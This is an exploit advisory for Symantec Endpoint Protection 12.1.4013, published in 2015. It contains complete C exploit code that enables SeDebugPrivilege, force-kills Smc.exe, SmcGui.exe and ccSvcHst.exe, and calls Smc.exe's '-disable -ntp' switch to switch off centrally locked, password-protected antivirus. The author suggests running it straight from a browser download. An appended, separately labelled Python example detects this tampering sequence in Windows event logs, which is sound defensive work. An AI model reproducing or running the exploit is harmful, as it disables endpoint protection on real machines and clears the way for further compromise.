# Exploit Title: Antivirus
# Google Dork: intitle: Antivirus
# Date: 2015-07-07
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.symantec.com
# Software Link: www.symantec.com/endpoint-protection
# Version: 12.1.4013
# Tested on: Windows 7 SP1
# Category: Antivirus

Vendor:
================================
Symantec ( www.symantec.com )

Product:
================================
Symantec EP 12.1.4013

Advisory Information:
================================================
Disabling Vulnerability

Vulnerability Details:
=====================
The Symantec EP agent and its services can be rendered useless even after endpoint protection has been globally locked down via a Symantec central management server and globally managed password protection controls have been enabled. A local user with SeDebugPrivilege (enabled below) can terminate Smc.exe, SmcGui.exe and ccSvcHst.exe, and can invoke Smc.exe's own "-disable -ntp" switch, without the managed password being checked. Tested successfully on Windows 7 SP1; results may vary between OS versions.

Exploit code(s):
===============

#include <windows.h>
#include <Tlhelp32.h>
#include <stdio.h>    /* printf, puts, sprintf */
#include <stdlib.h>   /* system */
#include <string.h>   /* strcmp, strcat */

#define SMC_EXE    "Smc.exe"
#define SMC_GUI    "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal: Kill Symantec EP agent & services after globally locking down endpoint protection
via the Symantec central management server and enabling globally managed password
protection controls. Tested successfully on Windows 7 SP1; results may vary OS to OS.

Scenario: Run from the browser upon download, or save to some directory and run.
Not the most elegant code and I don't care...
*/

/* Forward declaration: the function is defined after main() below. */
int SetDebugPrivileges(void);

/* Walk the process snapshot and terminate every process whose image name matches victimo. */
void el_crookedio_crosso(const char *victimo){
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize = sizeof(pEntry);
    BOOL hRes = Process32First(hSnapShot, &pEntry);
    while (hRes){
        if (strcmp(pEntry.szExeFile, victimo) == 0){
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0, (DWORD)pEntry.th32ProcessID);
            if (hProcess != NULL){
                TerminateProcess(hProcess, 9);
                CloseHandle(hProcess);
            }
        }
        hRes = Process32Next(hSnapShot, &pEntry);
    }
    CloseHandle(hSnapShot);
}

/* Return the PID of the first process whose image name matches ghostofsin, or 0 if not found. */
DWORD exeo_de_pid(const char *ghostofsin){
    DWORD ret = 0;
    PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
    HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcSnap == INVALID_HANDLE_VALUE) return 0;
    if (Process32First(hProcSnap, &pe32))
        do {
            if (!strcmp(pe32.szExeFile, ghostofsin)) { ret = pe32.th32ProcessID; break; }
        } while (Process32Next(hProcSnap, &pe32));
    CloseHandle(hProcSnap);
    return ret;
}

/* Kill the agent by PID, ask it to disable itself, then terminate the remaining processes. */
void angelo_maliciouso(void){
    DWORD AV = exeo_de_pid(SMC_EXE);
    char id[16];                       /* room for a 10-digit PID, a space and the NUL */
    sprintf(id, "%lu ", (unsigned long)AV);
    printf("%s", id);
    char cmd[64] = "Taskkill /F /PID ";
    strcat(cmd, id);
    system(cmd);
    // system("Taskkill /F /IM Smc.exe"); //Access denied.
    system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
    Sleep(1000);
    el_crookedio_crosso(SMC_EXE);
    el_crookedio_crosso(SMC_GUI);
    el_crookedio_crosso(CC_SVC_HST);
}

int main(void){
    puts("/*-----------------------------------------------------------*/\n");
    puts("|      EXORCIST DE SYMANTEC Antivirus version 12.1.4013      |\n");
    puts("|                  By hyp3rlinx - Jan 2015                   |\n");
    puts("/*------------------------------------------------------------*/\n");
    SetDebugPrivileges();
    angelo_maliciouso();
    Sleep(1000);
    el_crookedio_crosso(SMC_EXE);
    el_crookedio_crosso(SMC_GUI);
    el_crookedio_crosso(CC_SVC_HST);
    Sleep(2000);
    angelo_maliciouso();
    Sleep(6000);
    return 0;
}

/* Enable SeDebugPrivilege on the current process token; returns 0 on success or a Win32 error code. */
int SetDebugPrivileges(void){
    DWORD err = 0;
    TOKEN_PRIVILEGES Debug_Privileges;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Debug_Privileges.Privileges[0].Luid)) return GetLastError();
    HANDLE hToken = 0;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)){
        err = GetLastError();
        if (hToken) CloseHandle(hToken);
        return err;
    }
    Debug_Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    Debug_Privileges.PrivilegeCount = 1;
    if (!AdjustTokenPrivileges(hToken, FALSE, &Debug_Privileges, 0, NULL, NULL)){
        err = GetLastError();
    }
    if (hToken) CloseHandle(hToken);
    return err;
}

Disclosure Timeline:
=========================================================
Vendor Notification: Jan 20, 2015
July 7, 2015 : Public Disclosure

Severity Level:
=========================================================
High

Description:
==================================================================
Request Method(s):       [+] Click

Vulnerable Product:      [+] Symantec Endpoint Protection version 12.1.4013

Vulnerable Parameter(s): [+] N/A

Affected Area(s):        [+] Smc.exe, SmcGui.exe & ccSvcHst.exe

======================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
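The advisory above leaves three footprints in the Windows Security log that a defender can alert on: a taskkill.exe launch naming the agent's PID or image, Smc.exe being started with its "-disable" switch, and the protection processes exiting with a non-zero status (TerminateProcess with exit code 9 in the code above, rather than a clean 0x0 shutdown). The following detection logic is an added example, not part of the advisory or of Symantec's product. It models process-creation (4688) and process-exit (4689) events as dicts whose keys follow the event XML field names as I know them (NewProcessName, NewProcessId, CommandLine, ProcessName, Status); the sample events are constructed, and the PIDs and paths in them are made up.

```python
"""Detect the AV-tampering sequence from the Symantec EP 12.1.4013 advisory.

Added example, not the advisory's or Symantec's code. Events are dicts keyed
by Windows Security event XML field names (assumption: 4688 uses
NewProcessName/NewProcessId/CommandLine, 4689 uses ProcessName/ProcessId/Status,
with PIDs logged as hex strings). Note that 4688 only carries CommandLine when
"Include command line in process creation events" is enabled in audit policy.
"""
import re
from typing import Dict, Iterable, List

# Protection processes named in the advisory's "Affected Area(s)" section.
PROTECTED = {"smc.exe", "smcgui.exe", "ccsvchst.exe"}


def _basename(path: str) -> str:
    """Lower-cased image name without its directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_av_tampering(events: Iterable[Dict[str, str]]) -> List[str]:
    """Return one alert string per suspicious event, in log order.

    Rules:
      1. 4688 for Smc.exe whose command line carries "-disable".
      2. 4688 for taskkill.exe that names a protected image (/IM) or a PID
         previously logged as a protected process (/PID).
      3. 4689 for a protected process with a non-zero exit status, which a
         forced termination leaves behind and a clean shutdown does not.
    """
    alerts: List[str] = []
    protected_pids: Dict[int, str] = {}  # decimal PID -> image name

    for ev in events:
        eid = ev.get("EventID")
        if eid == "4688":
            image = _basename(ev.get("NewProcessName", ""))
            cmd = ev.get("CommandLine", "")
            if image in PROTECTED and ev.get("NewProcessId"):
                protected_pids[int(ev["NewProcessId"], 16)] = image
            if image == "smc.exe" and re.search(r"(^|\s)-disable\b", cmd, re.I):
                alerts.append(f"Smc.exe started with -disable: {cmd}")
            elif image == "taskkill.exe":
                im = re.search(r"/IM\s+(\S+)", cmd, re.I)
                pid = re.search(r"/PID\s+(\d+)", cmd, re.I)
                if im and im.group(1).lower() in PROTECTED:
                    alerts.append(f"taskkill.exe targeted protected image {im.group(1)}")
                elif pid and int(pid.group(1)) in protected_pids:
                    alerts.append(
                        f"taskkill.exe targeted protected PID {pid.group(1)} "
                        f"({protected_pids[int(pid.group(1))]})"
                    )
        elif eid == "4689":
            image = _basename(ev.get("ProcessName", ""))
            status = ev.get("Status", "0x0")
            if image in PROTECTED and int(status, 16) != 0:
                alerts.append(f"{image} exited with status {status}")
    return alerts


# Constructed sample log, in the order the advisory's program would produce it.
SEP_DIR = "C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\"
SAMPLE_EVENTS = [
    {"EventID": "4688", "NewProcessName": SEP_DIR + "Smc.exe",
     "NewProcessId": "0x9c4", "CommandLine": "Smc.exe"},                # PID 2500
    {"EventID": "4688", "NewProcessName": "C:\\Windows\\System32\\taskkill.exe",
     "NewProcessId": "0x1f40", "CommandLine": "Taskkill /F /PID 2500"},
    {"EventID": "4688", "NewProcessName": SEP_DIR + "Smc.exe",
     "NewProcessId": "0x1f58", "CommandLine": "\"" + SEP_DIR + "Smc.exe\" -disable -ntp"},
    {"EventID": "4689", "ProcessName": SEP_DIR + "ccSvcHst.exe",
     "ProcessId": "0xa10", "Status": "0x9"},
    # Benign noise that must not alert.
    {"EventID": "4689", "ProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ProcessId": "0x2000", "Status": "0x0"},
    {"EventID": "4688", "NewProcessName": "C:\\Windows\\System32\\taskkill.exe",
     "NewProcessId": "0x2100", "CommandLine": "taskkill /F /IM notepad.exe"},
]

if __name__ == "__main__":
    for line in detect_av_tampering(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Rule 3 is the one that survives even without command-line auditing, since 4689 is logged regardless; rules 1 and 2 need the command-line field, so check that audit setting before relying on them.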